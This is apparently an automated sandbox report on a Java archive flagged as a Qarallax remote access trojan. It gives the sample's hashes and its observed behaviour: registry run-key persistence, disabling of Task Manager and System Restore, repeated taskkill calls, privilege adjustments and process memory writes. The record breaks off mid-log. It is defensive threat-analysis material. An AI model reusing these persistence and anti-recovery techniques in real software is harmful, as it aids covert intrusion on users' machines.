Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
30-08-2020 08:23
Static task
static1
Behavioral task
behavioral1
Sample
08028.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
08028.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
08028.jar
-
Size
403KB
-
MD5
805fada47d34674fac492573b6f01de8
-
SHA1
a796de518f1c7582485d80d5e3d1904a20e79a22
-
SHA256
fbfd10ddb1840f5f1deedc2067baca46c28a06078d9abea612a7948c75fcd352
-
SHA512
f3f5d5bf9aa312a527c770f37d97f09ee8322293db00a302bb56cce5e407df2d94ec19ffb87d176e5867870b882b93c57f8b64b67deda1586a8ac3dc4d012a99
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ae2c-61.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 2584 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\VikxmIN = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hHEiU\\RAvDP.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\VikxmIN = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hHEiU\\RAvDP.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\hHEiU\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\hHEiU\Desktop.ini java.exe File created C:\Users\Admin\hHEiU\Desktop.ini java.exe File opened for modification C:\Users\Admin\hHEiU\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\wutDm java.exe File opened for modification C:\Windows\System32\wutDm java.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Kills process with taskkill 19 IoCs
pid Process 4688 taskkill.exe 1456 taskkill.exe 4788 taskkill.exe 2164 taskkill.exe 1440 taskkill.exe 4052 taskkill.exe 4548 taskkill.exe 4128 taskkill.exe 4464 taskkill.exe 4700 taskkill.exe 2224 taskkill.exe 4488 taskkill.exe 4692 taskkill.exe 4540 taskkill.exe 4472 taskkill.exe 4308 taskkill.exe 4416 taskkill.exe 4356 taskkill.exe 4828 taskkill.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = cc80450eb77ed601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2584 java.exe -
Suspicious use of AdjustPrivilegeToken 127 IoCs
description pid Process Token: SeShutdownPrivilege 2648 svchost.exe Token: SeCreatePagefilePrivilege 2648 svchost.exe Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe Token: SeSecurityPrivilege 1588 WMIC.exe Token: SeTakeOwnershipPrivilege 1588 WMIC.exe Token: SeLoadDriverPrivilege 1588 WMIC.exe Token: SeSystemProfilePrivilege 1588 WMIC.exe Token: SeSystemtimePrivilege 1588 WMIC.exe Token: SeProfSingleProcessPrivilege 1588 WMIC.exe Token: SeIncBasePriorityPrivilege 1588 WMIC.exe Token: SeCreatePagefilePrivilege 1588 WMIC.exe Token: SeBackupPrivilege 1588 WMIC.exe Token: SeRestorePrivilege 1588 WMIC.exe Token: SeShutdownPrivilege 1588 WMIC.exe Token: SeDebugPrivilege 1588 WMIC.exe Token: SeSystemEnvironmentPrivilege 1588 WMIC.exe Token: SeRemoteShutdownPrivilege 1588 WMIC.exe Token: SeUndockPrivilege 1588 WMIC.exe Token: SeManageVolumePrivilege 1588 WMIC.exe Token: 33 1588 WMIC.exe Token: 34 1588 WMIC.exe Token: 35 1588 WMIC.exe Token: 36 1588 WMIC.exe Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe Token: SeSecurityPrivilege 1588 WMIC.exe Token: SeTakeOwnershipPrivilege 1588 WMIC.exe Token: SeLoadDriverPrivilege 1588 WMIC.exe Token: SeSystemProfilePrivilege 1588 WMIC.exe Token: SeSystemtimePrivilege 1588 WMIC.exe Token: SeProfSingleProcessPrivilege 1588 WMIC.exe Token: SeIncBasePriorityPrivilege 1588 WMIC.exe Token: SeCreatePagefilePrivilege 1588 WMIC.exe Token: SeBackupPrivilege 1588 WMIC.exe Token: SeRestorePrivilege 1588 WMIC.exe Token: SeShutdownPrivilege 1588 WMIC.exe Token: SeDebugPrivilege 1588 WMIC.exe Token: SeSystemEnvironmentPrivilege 1588 WMIC.exe Token: SeRemoteShutdownPrivilege 1588 WMIC.exe Token: SeUndockPrivilege 1588 WMIC.exe Token: SeManageVolumePrivilege 1588 WMIC.exe Token: 33 1588 WMIC.exe Token: 34 1588 WMIC.exe Token: 35 1588 WMIC.exe Token: 36 1588 WMIC.exe Token: SeIncreaseQuotaPrivilege 1028 WMIC.exe Token: SeSecurityPrivilege 1028 WMIC.exe Token: SeTakeOwnershipPrivilege 1028 WMIC.exe Token: SeLoadDriverPrivilege 1028 WMIC.exe Token: SeSystemProfilePrivilege 1028 WMIC.exe Token: SeSystemtimePrivilege 1028 WMIC.exe Token: SeProfSingleProcessPrivilege 1028 WMIC.exe Token: SeIncBasePriorityPrivilege 1028 WMIC.exe Token: SeCreatePagefilePrivilege 1028 WMIC.exe Token: SeBackupPrivilege 1028 WMIC.exe Token: SeRestorePrivilege 1028 WMIC.exe Token: SeShutdownPrivilege 1028 WMIC.exe Token: SeDebugPrivilege 1028 WMIC.exe Token: SeSystemEnvironmentPrivilege 1028 WMIC.exe Token: SeRemoteShutdownPrivilege 1028 WMIC.exe Token: SeUndockPrivilege 1028 WMIC.exe Token: SeManageVolumePrivilege 1028 WMIC.exe Token: 33 1028 WMIC.exe Token: 34 1028 WMIC.exe Token: 35 1028 WMIC.exe Token: 36 1028 WMIC.exe Token: SeIncreaseQuotaPrivilege 1028 WMIC.exe Token: SeSecurityPrivilege 1028 WMIC.exe Token: SeTakeOwnershipPrivilege 1028 WMIC.exe Token: SeLoadDriverPrivilege 1028 WMIC.exe Token: SeSystemProfilePrivilege 1028 WMIC.exe Token: SeSystemtimePrivilege 1028 WMIC.exe Token: SeProfSingleProcessPrivilege 1028 WMIC.exe Token: SeIncBasePriorityPrivilege 1028 WMIC.exe Token: SeCreatePagefilePrivilege 1028 WMIC.exe Token: SeBackupPrivilege 1028 WMIC.exe Token: SeRestorePrivilege 1028 WMIC.exe Token: SeShutdownPrivilege 1028 WMIC.exe Token: SeDebugPrivilege 1028 WMIC.exe Token: SeSystemEnvironmentPrivilege 1028 WMIC.exe Token: SeRemoteShutdownPrivilege 1028 WMIC.exe Token: SeUndockPrivilege 1028 WMIC.exe Token: SeManageVolumePrivilege 1028 WMIC.exe Token: 33 1028 WMIC.exe Token: 34 1028 WMIC.exe Token: 35 1028 WMIC.exe Token: 36 1028 WMIC.exe Token: SeDebugPrivilege 2164 taskkill.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 4464 taskkill.exe Token: SeDebugPrivilege 1440 taskkill.exe Token: SeDebugPrivilege 4828 taskkill.exe Token: SeDebugPrivilege 4692 taskkill.exe Token: SeIncreaseQuotaPrivilege 1312 powershell.exe Token: SeSecurityPrivilege 1312 powershell.exe Token: SeTakeOwnershipPrivilege 1312 powershell.exe Token: SeLoadDriverPrivilege 1312 powershell.exe Token: SeSystemProfilePrivilege 1312 powershell.exe Token: SeSystemtimePrivilege 1312 powershell.exe Token: SeProfSingleProcessPrivilege 1312 powershell.exe Token: SeIncBasePriorityPrivilege 1312 powershell.exe Token: SeCreatePagefilePrivilege 1312 powershell.exe Token: SeBackupPrivilege 1312 powershell.exe Token: SeRestorePrivilege 1312 powershell.exe Token: SeShutdownPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeSystemEnvironmentPrivilege 1312 powershell.exe Token: SeRemoteShutdownPrivilege 1312 powershell.exe Token: SeUndockPrivilege 1312 powershell.exe Token: SeManageVolumePrivilege 1312 powershell.exe Token: 33 1312 powershell.exe Token: 34 1312 powershell.exe Token: 35 1312 powershell.exe Token: 36 1312 powershell.exe Token: SeDebugPrivilege 4540 taskkill.exe Token: SeDebugPrivilege 4688 taskkill.exe Token: SeDebugPrivilege 4472 taskkill.exe Token: SeDebugPrivilege 4488 taskkill.exe Token: SeDebugPrivilege 4308 taskkill.exe Token: SeDebugPrivilege 4052 taskkill.exe Token: SeDebugPrivilege 4700 taskkill.exe Token: SeDebugPrivilege 2224 taskkill.exe Token: SeDebugPrivilege 1456 taskkill.exe Token: SeDebugPrivilege 4548 taskkill.exe Token: SeDebugPrivilege 4128 taskkill.exe Token: SeDebugPrivilege 4788 taskkill.exe Token: SeDebugPrivilege 4416 taskkill.exe Token: SeDebugPrivilege 4356 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2584 java.exe -
Suspicious use of WriteProcessMemory 412 IoCs
description pid Process procid_target PID 2584 wrote to memory of 2260 2584 java.exe 76 PID 2584 wrote to memory of 2260 2584 java.exe 76 PID 2584 wrote to memory of 3092 2584 java.exe 78 PID 2584 wrote to memory of 3092 2584 java.exe 78 PID 3092 wrote to memory of 1588 3092 cmd.exe 80 PID 3092 wrote to memory of 1588 3092 cmd.exe 80 PID 2584 wrote to memory of 2168 2584 java.exe 81 PID 2584 wrote to memory of 2168 2584 java.exe 81 PID 2168 wrote to memory of 1028 2168 cmd.exe 83 PID 2168 wrote to memory of 1028 2168 cmd.exe 83 PID 2584 wrote to memory of 2224 2584 java.exe 84 PID 2584 wrote to memory of 2224 2584 java.exe 84 PID 2584 wrote to memory of 3816 2584 java.exe 86 PID 2584 wrote to memory of 3816 2584 java.exe 86 PID 2584 wrote to memory of 3344 2584 java.exe 88 PID 2584 wrote to memory of 3344 2584 java.exe 88 PID 2584 wrote to memory of 3388 2584 java.exe 90 PID 2584 wrote to memory of 3388 2584 java.exe 90 PID 2584 wrote to memory of 3368 2584 java.exe 91 PID 2584 wrote to memory of 3368 2584 java.exe 91 PID 2584 wrote to memory of 3684 2584 java.exe 93 PID 2584 wrote to memory of 3684 2584 java.exe 93 PID 2584 wrote to memory of 2944 2584 java.exe 95 PID 2584 wrote to memory of 2944 2584 java.exe 95 PID 2584 wrote to memory of 744 2584 java.exe 97 PID 2584 wrote to memory of 744 2584 java.exe 97 PID 2584 wrote to memory of 3704 2584 java.exe 100 PID 2584 wrote to memory of 3704 2584 java.exe 100 PID 2584 wrote to memory of 1312 2584 java.exe 102 PID 2584 wrote to memory of 1312 2584 java.exe 102 PID 2584 wrote to memory of 2164 2584 java.exe 103 PID 2584 wrote to memory of 2164 2584 java.exe 103 PID 3704 wrote to memory of 2252 3704 cmd.exe 106 PID 3704 wrote to memory of 2252 3704 cmd.exe 106 PID 2584 wrote to memory of 3852 2584 java.exe 107 PID 2584 wrote to memory of 3852 2584 java.exe 107 PID 2584 wrote to memory of 780 2584 java.exe 108 PID 2584 wrote to memory of 780 2584 java.exe 108 PID 2584 wrote to memory of 2188 2584 java.exe 111 PID 2584 wrote to memory of 2188 2584 java.exe 111 PID 2584 wrote to memory of 3548 2584 java.exe 112 PID 2584 wrote to memory of 3548 2584 java.exe 112 PID 2584 wrote to memory of 3716 2584 java.exe 115 PID 2584 wrote to memory of 3716 2584 java.exe 115 PID 2584 wrote to memory of 196 2584 java.exe 116 PID 2584 wrote to memory of 196 2584 java.exe 116 PID 2584 wrote to memory of 3556 2584 java.exe 119 PID 2584 wrote to memory of 3556 2584 java.exe 119 PID 2584 wrote to memory of 572 2584 java.exe 120 PID 2584 wrote to memory of 572 2584 java.exe 120 PID 2584 wrote to memory of 3912 2584 java.exe 123 PID 2584 wrote to memory of 3912 2584 java.exe 123 PID 2584 wrote to memory of 3844 2584 java.exe 124 PID 2584 wrote to memory of 3844 2584 java.exe 124 PID 2584 wrote to memory of 4176 2584 java.exe 128 PID 2584 wrote to memory of 4176 2584 java.exe 128 PID 2584 wrote to memory of 4184 2584 java.exe 129 PID 2584 wrote to memory of 4184 2584 java.exe 129 PID 2584 wrote to memory of 4308 2584 java.exe 132 PID 2584 wrote to memory of 4308 2584 java.exe 132 PID 2584 wrote to memory of 4340 2584 java.exe 133 PID 2584 wrote to memory of 4340 2584 java.exe 133 PID 2584 wrote to memory of 4436 2584 java.exe 136 PID 2584 wrote to memory of 4436 2584 java.exe 136 PID 2584 wrote to memory of 4464 2584 java.exe 137 PID 2584 wrote to memory of 4464 2584 java.exe 137 PID 2584 wrote to memory of 4476 2584 java.exe 138 PID 2584 wrote to memory of 4476 2584 java.exe 138 PID 2584 wrote to memory of 4552 2584 java.exe 142 PID 2584 wrote to memory of 4560 2584 java.exe 143 PID 2584 wrote to memory of 4552 2584 java.exe 142 PID 2584 wrote to memory of 4560 2584 java.exe 143 PID 3704 wrote to memory of 4596 3704 cmd.exe 144 PID 3704 wrote to memory of 4596 3704 cmd.exe 144 PID 2584 wrote to memory of 4716 2584 java.exe 147 PID 2584 wrote to memory of 4716 2584 java.exe 147 PID 2584 wrote to memory of 4732 2584 java.exe 148 PID 2584 wrote to memory of 4732 2584 java.exe 148 PID 2584 wrote to memory of 4820 2584 java.exe 151 PID 2584 wrote to memory of 4820 2584 java.exe 151 PID 2584 wrote to memory of 4884 2584 java.exe 152 PID 2584 wrote to memory of 4884 2584 java.exe 152 PID 2584 wrote to memory of 4972 2584 java.exe 155 PID 2584 wrote to memory of 4972 2584 java.exe 155 PID 2584 wrote to memory of 4984 2584 java.exe 156 PID 2584 wrote to memory of 4984 2584 java.exe 156 PID 2584 wrote to memory of 5044 2584 java.exe 159 PID 2584 wrote to memory of 5044 2584 java.exe 159 PID 2584 wrote to memory of 5052 2584 java.exe 160 PID 2584 wrote to memory of 5052 2584 java.exe 160 PID 2584 wrote to memory of 3408 2584 java.exe 163 PID 2584 wrote to memory of 3408 2584 java.exe 163 PID 2584 wrote to memory of 4164 2584 java.exe 165 PID 2584 wrote to memory of 4164 2584 java.exe 165 PID 2584 wrote to memory of 4144 2584 java.exe 166 PID 2584 wrote to memory of 4144 2584 java.exe 166 PID 2584 wrote to memory of 4276 2584 java.exe 169 PID 2584 wrote to memory of 4276 2584 java.exe 169 PID 2584 wrote to memory of 1440 2584 java.exe 170 PID 2584 wrote to memory of 1440 2584 java.exe 170 PID 2584 wrote to memory of 4364 2584 java.exe 172 PID 2584 wrote to memory of 4364 2584 java.exe 172 PID 2584 wrote to memory of 4504 2584 java.exe 175 PID 2584 wrote to memory of 4504 2584 java.exe 175 PID 2584 wrote to memory of 4668 2584 java.exe 177 PID 2584 wrote to memory of 4668 2584 java.exe 177 PID 4164 wrote to memory of 4812 4164 cmd.exe 179 PID 4164 wrote to memory of 4812 4164 cmd.exe 179 PID 4164 wrote to memory of 4352 4164 cmd.exe 180 PID 4164 wrote to memory of 4352 4164 cmd.exe 180 PID 2584 wrote to memory of 4184 2584 java.exe 181 PID 2584 wrote to memory of 4184 2584 java.exe 181 PID 2584 wrote to memory of 4828 2584 java.exe 183 PID 2584 wrote to memory of 4828 2584 java.exe 183 PID 4184 wrote to memory of 4264 4184 cmd.exe 185 PID 4184 wrote to memory of 4264 4184 cmd.exe 185 PID 4184 wrote to memory of 4460 4184 cmd.exe 186 PID 4184 wrote to memory of 4460 4184 cmd.exe 186 PID 2584 wrote to memory of 4876 2584 java.exe 187 PID 2584 wrote to memory of 4876 2584 java.exe 187 PID 4876 wrote to memory of 4424 4876 cmd.exe 189 PID 4876 wrote to memory of 4424 4876 cmd.exe 189 PID 4876 wrote to memory of 4688 4876 cmd.exe 190 PID 4876 wrote to memory of 4688 4876 cmd.exe 190 PID 2584 wrote to memory of 4744 2584 java.exe 191 PID 2584 wrote to memory of 4744 2584 java.exe 191 PID 2584 wrote to memory of 4692 2584 java.exe 192 PID 2584 wrote to memory of 4692 2584 java.exe 192 PID 4744 wrote to memory of 4768 4744 cmd.exe 195 PID 4744 wrote to memory of 4768 4744 cmd.exe 195 PID 4744 wrote to memory of 4700 4744 cmd.exe 196 PID 4744 wrote to memory of 4700 4744 cmd.exe 196 PID 2584 wrote to memory of 4856 2584 java.exe 197 PID 2584 wrote to memory of 4856 2584 java.exe 197 PID 4856 wrote to memory of 4672 4856 cmd.exe 199 PID 4856 wrote to memory of 4672 4856 cmd.exe 199 PID 4856 wrote to memory of 4844 4856 cmd.exe 200 PID 4856 wrote to memory of 4844 4856 cmd.exe 200 PID 2584 wrote to memory of 4852 2584 java.exe 201 PID 2584 wrote to memory of 4852 2584 java.exe 201 PID 4852 wrote to memory of 4716 4852 cmd.exe 203 PID 4852 wrote to memory of 4716 4852 cmd.exe 203 PID 4852 wrote to memory of 4860 4852 cmd.exe 204 PID 4852 wrote to memory of 4860 4852 cmd.exe 204 PID 2584 wrote to memory of 780 2584 java.exe 205 PID 2584 wrote to memory of 780 2584 java.exe 205 PID 780 wrote to memory of 4288 780 cmd.exe 208 PID 780 wrote to memory of 4288 780 cmd.exe 208 PID 780 wrote to memory of 4976 780 cmd.exe 209 PID 780 wrote to memory of 4976 780 cmd.exe 209 PID 2584 wrote to memory of 3388 2584 java.exe 210 PID 2584 wrote to memory of 3388 2584 java.exe 210 PID 3388 wrote to memory of 3096 3388 cmd.exe 212 PID 3388 wrote to memory of 3096 3388 cmd.exe 212 PID 3388 wrote to memory of 3820 3388 cmd.exe 213 PID 3388 wrote to memory of 3820 3388 cmd.exe 213 PID 2584 wrote to memory of 3584 2584 java.exe 214 PID 2584 wrote to memory of 3584 2584 java.exe 214 PID 3584 wrote to memory of 3644 3584 cmd.exe 216 PID 3584 wrote to memory of 3644 3584 cmd.exe 216 PID 3584 wrote to memory of 2844 3584 cmd.exe 217 PID 3584 wrote to memory of 2844 3584 cmd.exe 217 PID 2584 wrote to memory of 3776 2584 java.exe 218 PID 2584 wrote to memory of 3776 2584 java.exe 218 PID 3776 wrote to memory of 3748 3776 cmd.exe 220 PID 3776 wrote to memory of 3748 3776 cmd.exe 220 PID 3776 wrote to memory of 1996 3776 cmd.exe 221 PID 3776 wrote to memory of 1996 3776 cmd.exe 221 PID 2584 wrote to memory of 3972 2584 java.exe 222 PID 2584 wrote to memory of 3972 2584 java.exe 222 PID 3972 wrote to memory of 1840 3972 cmd.exe 224 PID 3972 wrote to memory of 1840 3972 cmd.exe 224 PID 3972 wrote to memory of 388 3972 cmd.exe 225 PID 3972 wrote to memory of 388 3972 cmd.exe 225 PID 2584 wrote to memory of 3504 2584 java.exe 226 PID 2584 wrote to memory of 3504 2584 java.exe 226 PID 3504 wrote to memory of 4228 3504 cmd.exe 228 PID 3504 wrote to memory of 4228 3504 cmd.exe 228 PID 3504 wrote to memory of 208 3504 cmd.exe 229 PID 3504 wrote to memory of 208 3504 cmd.exe 229 PID 2584 wrote to memory of 2956 2584 java.exe 230 PID 2584 wrote to memory of 2956 2584 java.exe 230 PID 2584 wrote to memory of 4540 2584 java.exe 232 PID 2584 wrote to memory of 4540 2584 java.exe 232 PID 2956 wrote to memory of 4420 2956 cmd.exe 233 PID 2956 wrote to memory of 4420 2956 cmd.exe 233 PID 2956 wrote to memory of 4604 2956 cmd.exe 235 PID 2956 wrote to memory of 4604 2956 cmd.exe 235 PID 2584 wrote to memory of 4356 2584 java.exe 236 PID 2584 wrote to memory of 4356 2584 java.exe 236 PID 4356 wrote to memory of 3708 4356 cmd.exe 238 PID 4356 wrote to memory of 3708 4356 cmd.exe 238 PID 4356 wrote to memory of 4896 4356 cmd.exe 239 PID 4356 wrote to memory of 4896 4356 cmd.exe 239 PID 2584 wrote to memory of 4464 2584 java.exe 240 PID 2584 wrote to memory of 4464 2584 java.exe 240 PID 4464 wrote to memory of 932 4464 cmd.exe 242 PID 4464 wrote to memory of 932 4464 cmd.exe 242 PID 4464 wrote to memory of 4060 4464 cmd.exe 243 PID 4464 wrote to memory of 4060 4464 cmd.exe 243 PID 2584 wrote to memory of 3964 2584 java.exe 244 PID 2584 wrote to memory of 3964 2584 java.exe 244 PID 3964 wrote to memory of 4148 3964 cmd.exe 246 PID 3964 wrote to memory of 4148 3964 cmd.exe 246 PID 3964 wrote to memory of 2968 3964 cmd.exe 247 PID 3964 wrote to memory of 2968 3964 cmd.exe 247 PID 2584 wrote to memory of 4408 2584 java.exe 248 PID 2584 wrote to memory of 4408 2584 java.exe 248 PID 4408 wrote to memory of 4868 4408 cmd.exe 250 PID 4408 wrote to memory of 4868 4408 cmd.exe 250 PID 4408 wrote to memory of 4388 4408 cmd.exe 251 PID 4408 wrote to memory of 4388 4408 cmd.exe 251 PID 2584 wrote to memory of 4828 2584 java.exe 252 PID 2584 wrote to memory of 4828 2584 java.exe 252 PID 4828 wrote to memory of 4308 4828 cmd.exe 254 PID 4828 wrote to memory of 4308 4828 cmd.exe 254 PID 4828 wrote to memory of 4500 4828 cmd.exe 255 PID 4828 wrote to memory of 4500 4828 cmd.exe 255 PID 2584 wrote to memory of 4616 2584 java.exe 256 PID 2584 wrote to memory of 4616 2584 java.exe 256 PID 2584 wrote to memory of 4688 2584 java.exe 257 PID 2584 wrote to memory of 4688 2584 java.exe 257 PID 4616 wrote to memory of 4720 4616 cmd.exe 260 PID 4616 wrote to memory of 4720 4616 cmd.exe 260 PID 4616 wrote to memory of 4516 4616 cmd.exe 261 PID 4616 wrote to memory of 4516 4616 cmd.exe 261 PID 2584 wrote to memory of 4640 2584 java.exe 262 PID 2584 wrote to memory of 4640 2584 java.exe 262 PID 4640 wrote to memory of 2400 4640 cmd.exe 264 PID 4640 wrote to memory of 2400 4640 cmd.exe 264 PID 4640 wrote to memory of 4716 4640 cmd.exe 265 PID 4640 wrote to memory of 4716 4640 cmd.exe 265 PID 2584 wrote to memory of 4816 2584 java.exe 266 PID 2584 wrote to memory of 4816 2584 java.exe 266 PID 4816 wrote to memory of 4884 4816 cmd.exe 268 PID 4816 wrote to memory of 4884 4816 cmd.exe 268 PID 4816 wrote to memory of 4104 4816 cmd.exe 269 PID 4816 wrote to memory of 4104 4816 cmd.exe 269 PID 2584 wrote to memory of 3096 2584 java.exe 270 PID 2584 wrote to memory of 3096 2584 java.exe 270 PID 3096 wrote to memory of 420 3096 cmd.exe 272 PID 3096 wrote to memory of 420 3096 cmd.exe 272 PID 3096 wrote to memory of 2016 3096 cmd.exe 273 PID 3096 wrote to memory of 2016 3096 cmd.exe 273 PID 2584 wrote to memory of 1564 2584 java.exe 274 PID 2584 wrote to memory of 1564 2584 java.exe 274 PID 1564 wrote to memory of 1996 1564 cmd.exe 276 PID 1564 wrote to memory of 1996 1564 cmd.exe 276 PID 1564 wrote to memory of 4244 1564 cmd.exe 277 PID 1564 wrote to memory of 4244 1564 cmd.exe 277 PID 2584 wrote to memory of 2148 2584 java.exe 278 PID 2584 wrote to memory of 2148 2584 java.exe 278 PID 2148 wrote to memory of 4548 2148 cmd.exe 280 PID 2148 wrote to memory of 4548 2148 cmd.exe 280 PID 2148 wrote to memory of 344 2148 cmd.exe 281 PID 2148 wrote to memory of 344 2148 cmd.exe 281 PID 2584 wrote to memory of 8 2584 java.exe 282 PID 2584 wrote to memory of 8 2584 java.exe 282 PID 8 wrote to memory of 3188 8 cmd.exe 284 PID 8 wrote to memory of 3188 8 cmd.exe 284 PID 8 wrote to memory of 3372 8 cmd.exe 285 PID 8 wrote to memory of 3372 8 cmd.exe 285 PID 2584 wrote to memory of 1036 2584 java.exe 286 PID 2584 wrote to memory of 1036 2584 java.exe 286 PID 1036 wrote to memory of 4128 1036 cmd.exe 288 PID 1036 wrote to memory of 4128 1036 cmd.exe 288 PID 1036 wrote to memory of 4528 1036 cmd.exe 289 PID 1036 wrote to memory of 4528 1036 cmd.exe 289 PID 2584 wrote to memory of 4472 2584 java.exe 290 PID 2584 wrote to memory of 4472 2584 java.exe 290 PID 2584 wrote to memory of 2772 2584 java.exe 292 PID 2584 wrote to memory of 2772 2584 java.exe 292 PID 2772 wrote to memory of 5004 2772 cmd.exe 294 PID 2772 wrote to memory of 5004 2772 cmd.exe 294 PID 2772 wrote to memory of 3908 2772 cmd.exe 295 PID 2772 wrote to memory of 3908 2772 cmd.exe 295 PID 2584 wrote to memory of 4060 2584 java.exe 296 PID 2584 wrote to memory of 4060 2584 java.exe 296 PID 4060 wrote to memory of 4280 4060 cmd.exe 298 PID 4060 wrote to memory of 4280 4060 cmd.exe 298 PID 4060 wrote to memory of 4320 4060 cmd.exe 299 PID 4060 wrote to memory of 4320 4060 cmd.exe 299 PID 2584 wrote to memory of 4600 2584 java.exe 300 PID 2584 wrote to memory of 4600 2584 java.exe 300 PID 4600 wrote to memory of 4340 4600 cmd.exe 302 PID 4600 wrote to memory of 4340 4600 cmd.exe 302 PID 4600 wrote to memory of 4308 4600 cmd.exe 303 PID 4600 wrote to memory of 4308 4600 cmd.exe 303 PID 2584 wrote to memory of 2232 2584 java.exe 304 PID 2584 wrote to memory of 2232 2584 java.exe 304 PID 2232 wrote to memory of 4276 2232 cmd.exe 306 PID 2232 wrote to memory of 4276 2232 cmd.exe 306 PID 2232 wrote to memory of 4636 2232 cmd.exe 307 PID 2232 wrote to memory of 4636 2232 cmd.exe 307 PID 2584 wrote to memory of 4568 2584 java.exe 308 PID 2584 wrote to memory of 4568 2584 java.exe 308 PID 4568 wrote to memory of 4880 4568 cmd.exe 310 PID 4568 wrote to memory of 4880 4568 cmd.exe 310 PID 2584 wrote to memory of 4488 2584 java.exe 311 PID 2584 wrote to memory of 4488 2584 java.exe 311 PID 4568 wrote to memory of 4132 4568 cmd.exe 313 PID 4568 wrote to memory of 4132 4568 cmd.exe 313 PID 2584 wrote to memory of 2052 2584 java.exe 314 PID 2584 wrote to memory of 2052 2584 java.exe 314 PID 2052 wrote to memory of 3504 2052 cmd.exe 316 PID 2052 wrote to memory of 3504 2052 cmd.exe 316 PID 2052 wrote to memory of 4464 2052 cmd.exe 317 PID 2052 wrote to memory of 4464 2052 cmd.exe 317 PID 2584 wrote to memory of 3964 2584 java.exe 318 PID 2584 wrote to memory of 3964 2584 java.exe 318 PID 3964 wrote to memory of 780 3964 cmd.exe 320 PID 3964 wrote to memory of 780 3964 cmd.exe 320 PID 3964 wrote to memory of 3484 3964 cmd.exe 321 PID 3964 wrote to memory of 3484 3964 cmd.exe 321 PID 2584 wrote to memory of 4028 2584 java.exe 322 PID 2584 wrote to memory of 4028 2584 java.exe 322 PID 4028 wrote to memory of 4108 4028 cmd.exe 324 PID 4028 wrote to memory of 4108 4028 cmd.exe 324 PID 4028 wrote to memory of 4840 4028 cmd.exe 325 PID 4028 wrote to memory of 4840 4028 cmd.exe 325 PID 2584 wrote to memory of 4804 2584 java.exe 326 PID 2584 wrote to memory of 4804 2584 java.exe 326 PID 4804 wrote to memory of 4668 4804 cmd.exe 328 PID 4804 wrote to memory of 4668 4804 cmd.exe 328 PID 4804 wrote to memory of 4784 4804 cmd.exe 329 PID 4804 wrote to memory of 4784 4804 cmd.exe 329 PID 2584 wrote to memory of 204 2584 java.exe 330 PID 2584 wrote to memory of 204 2584 java.exe 330 PID 204 wrote to memory of 4748 204 cmd.exe 332 PID 204 wrote to memory of 4748 204 cmd.exe 332 PID 204 wrote to memory of 4940 204 cmd.exe 333 PID 204 wrote to memory of 4940 204 cmd.exe 333 PID 2584 wrote to memory of 3456 2584 java.exe 334 PID 2584 wrote to memory of 3456 2584 java.exe 334 PID 3456 wrote to memory of 4904 3456 cmd.exe 336 PID 3456 wrote to memory of 4904 3456 cmd.exe 336 PID 3456 wrote to memory of 744 3456 cmd.exe 337 PID 3456 wrote to memory of 744 3456 cmd.exe 337 PID 2584 wrote to memory of 5108 2584 java.exe 338 PID 2584 wrote to memory of 5108 2584 java.exe 338 PID 5108 wrote to memory of 2844 5108 cmd.exe 340 PID 5108 wrote to memory of 2844 5108 cmd.exe 340 PID 5108 wrote to memory of 2016 5108 cmd.exe 341 PID 5108 wrote to memory of 2016 5108 cmd.exe 341 PID 2584 wrote to memory of 4256 2584 java.exe 342 PID 2584 wrote to memory of 4256 2584 java.exe 342 PID 4256 wrote to memory of 4656 4256 cmd.exe 344 PID 4256 wrote to memory of 4656 